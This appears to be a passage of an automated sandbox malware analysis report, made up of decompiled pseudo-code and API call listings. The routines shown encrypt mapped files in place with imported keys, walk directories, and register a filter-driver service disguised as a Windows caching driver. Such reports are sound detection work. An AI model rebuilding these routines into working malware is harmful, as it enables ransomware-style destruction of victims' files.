                                                                                                          				_t59 = E04A45A73(_t92, _t57, _v44, _v40, _a8,  &_v20,  &_v32); // executed
                                                                                                          				if(_t59 == 0 || _v20 != 0) {
                                                                                                          					L14:
                                                                                                          					_t70 = _v36;
                                                                                                          					goto L15;
                                                                                                          				} else {
                                                                                                          					_t63 = MapViewOfFile(_v8, 6, 0, 0, _a4); // executed
                                                                                                          					_v28 = _t63;
                                                                                                          					if(_t63 == 0) {
                                                                                                          						goto L14;
                                                                                                          					}
                                                                                                          					__imp__CryptEncrypt(_v16, 0, _v24, 0, _t63,  &_a4, _t69);
                                                                                                          					_t70 = _t63;
                                                                                                          					if(_t70 != 0) {
                                                                                                          						FlushViewOfFile(_v28, _a4);
                                                                                                          					}
                                                                                                          					UnmapViewOfFile(_v28);
                                                                                                          					_t97 = _t70;
                                                                                                          					if(_t70 != 0) {
                                                                                                          						E04A45BC4(_t97, _v8, _t85, 0, _a8); // executed
                                                                                                          					}
                                                                                                          					L15:
                                                                                                          					FindCloseChangeNotification(_v8); // executed
                                                                                                          					if(_t70 == 0) {
                                                                                                          						asm("sbb edi, [ebp-0x24]");
                                                                                                          						E04A45A11(_v12, _t85 - _v44, 0);
                                                                                                          					}
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          			}

























                                                                                                          0x04a45d13
                                                                                                          0x04a45d16
                                                                                                          0x04a45d18
                                                                                                          0x04a45d21
                                                                                                          0x04a45d24
                                                                                                          0x04a45d27
                                                                                                          0x04a45d2a
                                                                                                          0x04a45d32
                                                                                                          0x04a45e9c
                                                                                                          0x04a45e9c
                                                                                                          0x04a45e9c
                                                                                                          0x04a45d46
                                                                                                          0x04a45d4c
                                                                                                          0x04a45d52
                                                                                                          0x04a45e7c
                                                                                                          0x04a45e7f
                                                                                                          0x04a45e88
                                                                                                          0x00000000
                                                                                                          0x04a45e8f
                                                                                                          0x00000000
                                                                                                          0x04a45e92
                                                                                                          0x04a45e88
                                                                                                          0x04a45d5d
                                                                                                          0x04a45d60
                                                                                                          0x04a45d66
                                                                                                          0x04a45d69
                                                                                                          0x04a45d71
                                                                                                          0x04a45d74
                                                                                                          0x04a45d76
                                                                                                          0x04a45d83
                                                                                                          0x04a45d8a
                                                                                                          0x04a45d8d
                                                                                                          0x04a45d95
                                                                                                          0x04a45d9f
                                                                                                          0x04a45d9f
                                                                                                          0x04a45da7
                                                                                                          0x04a45dad
                                                                                                          0x04a45daf
                                                                                                          0x04a45db3
                                                                                                          0x04a45dbc
                                                                                                          0x04a45dc2
                                                                                                          0x04a45dc5
                                                                                                          0x04a45dc7
                                                                                                          0x04a45e6e
                                                                                                          0x04a45e71
                                                                                                          0x04a45e77
                                                                                                          0x04a45e7a
                                                                                                          0x00000000
                                                                                                          0x04a45e7a
                                                                                                          0x04a45dcd
                                                                                                          0x04a45de3
                                                                                                          0x04a45dea
                                                                                                          0x04a45e4e
                                                                                                          0x04a45e4e
                                                                                                          0x00000000
                                                                                                          0x04a45df3
                                                                                                          0x04a45dfd
                                                                                                          0x04a45e03
                                                                                                          0x04a45e08
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45e1a
                                                                                                          0x04a45e20
                                                                                                          0x04a45e24
                                                                                                          0x04a45e2c
                                                                                                          0x04a45e2c
                                                                                                          0x04a45e35
                                                                                                          0x04a45e3b
                                                                                                          0x04a45e3d
                                                                                                          0x04a45e47
                                                                                                          0x04a45e47
                                                                                                          0x04a45e51
                                                                                                          0x04a45e54
                                                                                                          0x04a45e5c
                                                                                                          0x04a45e61
                                                                                                          0x04a45e69
                                                                                                          0x04a45e69
                                                                                                          0x00000000
                                                                                                          0x04a45e5c

                                                                                                          APIs
                                                                                                          • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 04A45D2A
                                                                                                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 04A45D46
                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 04A45D60
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A45D8D
                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 04A45DBC
                                                                                                          • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 04A45DFD
                                                                                                          • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 04A45E1A
                                                                                                          • FlushViewOfFile.KERNEL32(?,?), ref: 04A45E2C
                                                                                                          • UnmapViewOfFile.KERNEL32(?), ref: 04A45E35
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,?,?,00000010,?), ref: 04A45E54
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A45E71
                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 04A45E7F
                                                                                                          • SetEvent.KERNEL32(?), ref: 04A45E92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CryptView$CloseCreate$ChangeDestroyDuplicateEncryptEventFindFlushHandleMappingNotificationSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID:
                                                                                                          • API String ID: 3885221687-0
                                                                                                          • Opcode ID: 764ee026b277cb3dc4fbb018d23fb11062aa93b928c7e21a251150e8b7681bfd
                                                                                                          • Instruction ID: 9285614c5c579b23400e47101c806645b27faf8f4ce74e4d7a09fb5e65f5f8c6
                                                                                                          • Opcode Fuzzy Hash: 764ee026b277cb3dc4fbb018d23fb11062aa93b928c7e21a251150e8b7681bfd
                                                                                                          • Instruction Fuzzy Hash: 28516776D00219BBEF119FA5CC49AEFBF79EFC8750F144025FA05A2150D776AA41CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 40%
                                                                                                          			E04A45A73(void* __eflags, void* _a4, intOrPtr _a8, long _a16, signed int* _a20, signed int* _a24) {
                                                                                                          				long _v8;
                                                                                                          				void* _v12;
                                                                                                          				struct _SYSTEM_INFO _v48;
                                                                                                          				void* _t45;
                                                                                                          				long _t47;
                                                                                                          				void* _t48;
                                                                                                          				signed int _t51;
                                                                                                          				void** _t53;
                                                                                                          				long _t54;
                                                                                                          				long* _t56;
                                                                                                          				void* _t62;
                                                                                                          				void* _t63;
                                                                                                          				signed int _t64;
                                                                                                          				long _t78;
                                                                                                          				intOrPtr _t82;
                                                                                                          				void* _t88;
                                                                                                          				void* _t98;
                                                                                                          				long* _t103;
                                                                                                          
                                                                                                          				_t64 = 8;
                                                                                                          				_v48.dwOemId = 0;
                                                                                                          				memset( &(_v48.dwPageSize), 0, _t64 << 2);
                                                                                                          				_v8 = 0;
                                                                                                          				GetSystemInfo( &_v48); // executed
                                                                                                          				_t88 =  *(_a16 + 0x44) + 0x16;
                                                                                                          				_t82 = _a8 - _t88;
                                                                                                          				asm("sbb [ebp+0x10], ebx");
                                                                                                          				_t61 = _v48.dwAllocationGranularity;
                                                                                                          				asm("adc edx, [ebp+0x10]");
                                                                                                          				asm("sbb edx, eax");
                                                                                                          				_a8 = _t82;
                                                                                                          				_t45 = E04A4A6B0(_v48.dwAllocationGranularity + _t82 - 1, 0, _v48.dwAllocationGranularity, 0);
                                                                                                          				asm("sbb edx, 0x0");
                                                                                                          				_t47 = E04A4A670(_t45 - 1, 0, _t61, 0);
                                                                                                          				_t62 = _t82 - _t47;
                                                                                                          				_t48 = MapViewOfFile(_a4, 4, 0, _t47, _t62 + _t88); // executed
                                                                                                          				_v12 = _t48;
                                                                                                          				_t98 = _t48;
                                                                                                          				if(_t98 != 0) {
                                                                                                          					_t78 = _a16;
                                                                                                          					_push(9);
                                                                                                          					asm("repe cmpsw");
                                                                                                          					_t51 = 0 | _t98 == 0x00000000;
                                                                                                          					 *_a20 = _t51;
                                                                                                          					if(_t51 == 0) {
                                                                                                          						_v8 = 1;
                                                                                                          					} else {
                                                                                                          						_t53 =  &_a4;
                                                                                                          						_a4 = 0;
                                                                                                          						__imp__CryptDuplicateHash( *((intOrPtr*)(_t78 + 0x40)), 0, 0, _t53);
                                                                                                          						if(_t53 != 0) {
                                                                                                          							__imp__CryptHashData(_a4, _v12 + _t62, 4, 0);
                                                                                                          							if(_t53 != 0) {
                                                                                                          								_t54 =  *(_a16 + 0x44);
                                                                                                          								_a16 = _t54;
                                                                                                          								_t63 = LocalAlloc(0x40, _t54);
                                                                                                          								if(_t63 != 0) {
                                                                                                          									_t56 =  &_a16;
                                                                                                          									__imp__CryptGetHashParam(_a4, 2, _t63, _t56, 0);
                                                                                                          									_v8 = _t56;
                                                                                                          									_t103 = _t56;
                                                                                                          									if(_t103 != 0) {
                                                                                                          										asm("repe cmpsb");
                                                                                                          										 *_a24 = 0 | _t103 == 0x00000000;
                                                                                                          									}
                                                                                                          									LocalFree(_t63);
                                                                                                          								}
                                                                                                          							}
                                                                                                          							__imp__CryptDestroyHash(_a4);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					UnmapViewOfFile(_v12);
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}





















                                                                                                          0x04a45a80
                                                                                                          0x04a45a83
                                                                                                          0x04a45a89
                                                                                                          0x04a45a8f
                                                                                                          0x04a45a92
                                                                                                          0x04a45aa1
                                                                                                          0x04a45aa4
                                                                                                          0x04a45aa6
                                                                                                          0x04a45aa9
                                                                                                          0x04a45ab4
                                                                                                          0x04a45abc
                                                                                                          0x04a45ac0
                                                                                                          0x04a45ac3
                                                                                                          0x04a45acd
                                                                                                          0x04a45ad6
                                                                                                          0x04a45add
                                                                                                          0x04a45aea
                                                                                                          0x04a45af0
                                                                                                          0x04a45af3
                                                                                                          0x04a45af5
                                                                                                          0x04a45afb
                                                                                                          0x04a45b05
                                                                                                          0x04a45b11
                                                                                                          0x04a45b17
                                                                                                          0x04a45b1a
                                                                                                          0x04a45b20
                                                                                                          0x04a45baa
                                                                                                          0x04a45b26
                                                                                                          0x04a45b26
                                                                                                          0x04a45b2f
                                                                                                          0x04a45b32
                                                                                                          0x04a45b3a
                                                                                                          0x04a45b49
                                                                                                          0x04a45b51
                                                                                                          0x04a45b56
                                                                                                          0x04a45b5c
                                                                                                          0x04a45b65
                                                                                                          0x04a45b69
                                                                                                          0x04a45b6d
                                                                                                          0x04a45b77
                                                                                                          0x04a45b7d
                                                                                                          0x04a45b80
                                                                                                          0x04a45b82
                                                                                                          0x04a45b8e
                                                                                                          0x04a45b96
                                                                                                          0x04a45b96
                                                                                                          0x04a45b99
                                                                                                          0x04a45b99
                                                                                                          0x04a45b69
                                                                                                          0x04a45ba2
                                                                                                          0x04a45ba2
                                                                                                          0x04a45b3a
                                                                                                          0x04a45bb4
                                                                                                          0x04a45bb4
                                                                                                          0x04a45bc1

                                                                                                          APIs
                                                                                                          • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,04A45DE8,00000000,?,?,?,00000010,?), ref: 04A45A92
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A45AC3
                                                                                                          • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45AEA
                                                                                                          • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45B32
                                                                                                          • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45B49
                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45B5F
                                                                                                          • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45B77
                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45B99
                                                                                                          • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45BA2
                                                                                                          • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45BB4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: encrypted
                                                                                                          • API String ID: 569730286-1467498611
                                                                                                          • Opcode ID: 010191f61654899d56195a475f458356611f3e376ce18107029b950d98d8863c
                                                                                                          • Instruction ID: a81ce28fc6420deeced10d6dae4fbb3ab9dc43475d240ce4966ee8f3682209f0
                                                                                                          • Opcode Fuzzy Hash: 010191f61654899d56195a475f458356611f3e376ce18107029b950d98d8863c
                                                                                                          • Instruction Fuzzy Hash: DB411FB6A00209AFEB14DF74DD44AAE7BA9EBC4355F054029FE05E7240EB75ED05CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A41368(void* __ecx) {
                                                                                                          				void* _v8;
                                                                                                          				void* _t5;
                                                                                                          				void* _t13;
                                                                                                          				void* _t17;
                                                                                                          
                                                                                                          				_t5 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                                          				_t13 = _t5;
                                                                                                          				if(_t13 != 0) {
                                                                                                          					_t17 = CreateServiceW(_t13, L"cscc", L"Windows Client Side Caching DDriver", 0xf01ff, 1, 0, 3, L"cscc.dat", L"Filter", 0, L"FltMgr", 0, 0);
                                                                                                          					if(_t17 == 0) {
                                                                                                          						_v8 = GetLastError();
                                                                                                          					} else {
                                                                                                          						_v8 = 0;
                                                                                                          					}
                                                                                                          					if(_t17 != 0) {
                                                                                                          						CloseServiceHandle(_t17);
                                                                                                          					}
                                                                                                          					CloseServiceHandle(_t13);
                                                                                                          				} else {
                                                                                                          					_v8 = GetLastError();
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}







                                                                                                          0x04a41377
                                                                                                          0x04a4137d
                                                                                                          0x04a41381
                                                                                                          0x04a413bc
                                                                                                          0x04a413c0
                                                                                                          0x04a413cd
                                                                                                          0x04a413c2
                                                                                                          0x04a413c2
                                                                                                          0x04a413c2
                                                                                                          0x04a413d8
                                                                                                          0x04a413db
                                                                                                          0x04a413db
                                                                                                          0x04a413de
                                                                                                          0x04a41383
                                                                                                          0x04a41389
                                                                                                          0x04a41389
                                                                                                          0x04a413e7

                                                                                                          APIs
                                                                                                          • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,04A4154F,00000000,04A411D0,?,?,?), ref: 04A41377
                                                                                                          • GetLastError.KERNEL32(?,04A4154F,00000000,04A411D0,?,?,?), ref: 04A41383
                                                                                                          • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,04A4154F), ref: 04A413B6
                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,04A4154F,00000000,04A411D0,?,?,?), ref: 04A413DB
                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,04A4154F,00000000,04A411D0,?,?,?), ref: 04A413DE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                                                                                          • String ID: Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                                                                                          • API String ID: 2226085316-2908389127
                                                                                                          • Opcode ID: 0ac81ca1b8eaabcfc55dc73303151885883851cb92e3d98e06f024e932a9ff0a
                                                                                                          • Instruction ID: fb3447fe380c3bc677d9dfd1e549d762a4a355869f5a06bba044ba6fe93e88ab
                                                                                                          • Opcode Fuzzy Hash: 0ac81ca1b8eaabcfc55dc73303151885883851cb92e3d98e06f024e932a9ff0a
                                                                                                          • Instruction Fuzzy Hash: 8101A235782324BBC3616BB2AD4DC9F7E6CEBD5BA1B000411F906A3500DAF07942DAA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 91%
                                                                                                          			E04A46299(void* __ecx, void* _a4) {
                                                                                                          				void* __esi;
                                                                                                          				void* _t12;
                                                                                                          				char* _t13;
                                                                                                          				void* _t16;
                                                                                                          				void* _t19;
                                                                                                          				void* _t22;
                                                                                                          				void* _t26;
                                                                                                          				int _t31;
                                                                                                          				void* _t32;
                                                                                                          				void* _t33;
                                                                                                          				void* _t34;
                                                                                                          				long** _t36;
                                                                                                          				void* _t38;
                                                                                                          
                                                                                                          				_t33 = __ecx;
                                                                                                          				_t31 = 0;
                                                                                                          				_t12 = CreateEventW(0, 1, 0, 0);
                                                                                                          				_t38 = _a4;
                                                                                                          				 *(_t38 + 0x48) = _t12;
                                                                                                          				if(_t12 != 0) {
                                                                                                          					_t36 = _t38 + 0x30;
                                                                                                          					_t16 = E04A45507(_t36); // executed
                                                                                                          					if(_t16 != 0) {
                                                                                                          						_t19 = E04A45613( *_t36,  *((intOrPtr*)(_t38 + 0x34)), _t38 + 0x38); // executed
                                                                                                          						if(_t19 != 0) {
                                                                                                          							_t22 = E04A46085(_t38, _t33); // executed
                                                                                                          							if(_t22 != 0) {
                                                                                                          								if(E04A46246(_t33, _t38) != 0) {
                                                                                                          									_t26 = CreateThread(0, 0, E04A460F9, _t38, 0, 0); // executed
                                                                                                          									_t32 = _t26;
                                                                                                          									E04A45E9F(_t38 + 4, 0x11, _t38); // executed
                                                                                                          									if(_t32 != 0) {
                                                                                                          										WaitForSingleObject(_t32, 0xffffffff);
                                                                                                          										CloseHandle(_t32);
                                                                                                          									}
                                                                                                          									__imp__CryptDestroyHash( *((intOrPtr*)(_t38 + 0x40)));
                                                                                                          									_t31 = 0;
                                                                                                          								}
                                                                                                          								CryptDestroyKey( *(_t38 + 0x3c));
                                                                                                          							}
                                                                                                          							CryptDestroyKey( *(_t38 + 0x38));
                                                                                                          						}
                                                                                                          						CryptReleaseContext( *_t36, _t31);
                                                                                                          					}
                                                                                                          					CloseHandle( *(_t38 + 0x48));
                                                                                                          				}
                                                                                                          				_t34 = 0x21;
                                                                                                          				_t13 = _t38 + 0xc;
                                                                                                          				do {
                                                                                                          					 *_t13 = 0;
                                                                                                          					_t13 = _t13 + 1;
                                                                                                          					_t34 = _t34 - 1;
                                                                                                          				} while (_t34 != 0);
                                                                                                          				LocalFree(_t38);
                                                                                                          				return 0;
                                                                                                          			}
















                                                                                                          0x04a46299
                                                                                                          0x04a4629e
                                                                                                          0x04a462a5
                                                                                                          0x04a462ab
                                                                                                          0x04a462ae
                                                                                                          0x04a462b3
                                                                                                          0x04a462ba
                                                                                                          0x04a462be
                                                                                                          0x04a462c5
                                                                                                          0x04a462d0
                                                                                                          0x04a462d7
                                                                                                          0x04a462db
                                                                                                          0x04a462e2
                                                                                                          0x04a462eb
                                                                                                          0x04a462f7
                                                                                                          0x04a462fe
                                                                                                          0x04a46306
                                                                                                          0x04a4630d
                                                                                                          0x04a46312
                                                                                                          0x04a46319
                                                                                                          0x04a46319
                                                                                                          0x04a46322
                                                                                                          0x04a46328
                                                                                                          0x04a46328
                                                                                                          0x04a4632d
                                                                                                          0x04a4632d
                                                                                                          0x04a46336
                                                                                                          0x04a46336
                                                                                                          0x04a4633f
                                                                                                          0x04a4633f
                                                                                                          0x04a46348
                                                                                                          0x04a4634e
                                                                                                          0x04a46351
                                                                                                          0x04a46352
                                                                                                          0x04a46355
                                                                                                          0x04a46355
                                                                                                          0x04a46358
                                                                                                          0x04a46359
                                                                                                          0x04a46359
                                                                                                          0x04a4635d
                                                                                                          0x04a46368

                                                                                                          APIs
                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04A462A5
                                                                                                          • LocalFree.KERNEL32(?), ref: 04A4635D
                                                                                                            • Part of subcall function 04A45507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04A462C3,?), ref: 04A45520
                                                                                                            • Part of subcall function 04A45507: GetLastError.KERNEL32(?,04A462C3,?), ref: 04A45528
                                                                                                            • Part of subcall function 04A45507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04A462C3,?), ref: 04A4553E
                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 04A46348
                                                                                                            • Part of subcall function 04A45613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04A45636
                                                                                                            • Part of subcall function 04A45613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04A4564C
                                                                                                            • Part of subcall function 04A45613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04A45662
                                                                                                            • Part of subcall function 04A45613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04A45682
                                                                                                            • Part of subcall function 04A45613: LocalAlloc.KERNEL32(00000040,?), ref: 04A4568D
                                                                                                            • Part of subcall function 04A45613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04A456A6
                                                                                                            • Part of subcall function 04A45613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04A456B5
                                                                                                            • Part of subcall function 04A45613: LocalFree.KERNEL32(00000000), ref: 04A456BF
                                                                                                            • Part of subcall function 04A45613: LocalFree.KERNEL32(?), ref: 04A456C8
                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 04A4633F
                                                                                                            • Part of subcall function 04A46085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04A462E0,?,?,?,?), ref: 04A460A6
                                                                                                            • Part of subcall function 04A46085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04A462E0,?,?,?,?), ref: 04A460BA
                                                                                                            • Part of subcall function 04A46085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04A462E0,?,?,?,?), ref: 04A460D3
                                                                                                            • Part of subcall function 04A46085: CryptDestroyHash.ADVAPI32(?,?,?,?,04A462E0,?,?,?,?), ref: 04A460DF
                                                                                                          • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04A46336
                                                                                                            • Part of subcall function 04A46246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04A462E9,?,?,?,?), ref: 04A46260
                                                                                                            • Part of subcall function 04A46246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04A462E9,?,?,?,?), ref: 04A46273
                                                                                                            • Part of subcall function 04A46246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04A462E9,?,?,?,?), ref: 04A46289
                                                                                                          • CreateThread.KERNELBASE ref: 04A462F7
                                                                                                            • Part of subcall function 04A45E9F: PathCombineW.SHLWAPI(?,?,04A51554,?,?), ref: 04A45EC8
                                                                                                            • Part of subcall function 04A45E9F: FindFirstFileW.KERNELBASE(?,?), ref: 04A45EE3
                                                                                                            • Part of subcall function 04A45E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04A45F09
                                                                                                            • Part of subcall function 04A45E9F: PathCombineW.SHLWAPI(?,?,?), ref: 04A45FB1
                                                                                                            • Part of subcall function 04A45E9F: StrStrIW.SHLWAPI(?,04A53014), ref: 04A45FE9
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 04A46312
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04A46319
                                                                                                          • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 04A46322
                                                                                                          • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04A4632D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2692407486-0
                                                                                                          • Opcode ID: 7d886d45d0857e4578b9a5b88c9c04dd1ad3ebde7027dd367bc1aacd29bf4403
                                                                                                          • Instruction ID: 892727227e53c8a600bc0b59ff7fb671f8c83701f4d6492845e8330dd9accb6a
                                                                                                          • Opcode Fuzzy Hash: 7d886d45d0857e4578b9a5b88c9c04dd1ad3ebde7027dd367bc1aacd29bf4403
                                                                                                          • Instruction Fuzzy Hash: 4B215E75100644BFF7216BA4ED88DAF7BACEFD9355B044429FA4285460DB6AFC428B20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04A45636
                                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04A4564C
                                                                                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04A45662
                                                                                                          • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04A45682
                                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 04A4568D
                                                                                                          • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04A456A6
                                                                                                          • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04A456B5
                                                                                                          • LocalFree.KERNEL32(00000000), ref: 04A456BF
                                                                                                          • LocalFree.KERNEL32(?), ref: 04A456C8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                                                          • String ID:
                                                                                                          • API String ID: 3940947887-0
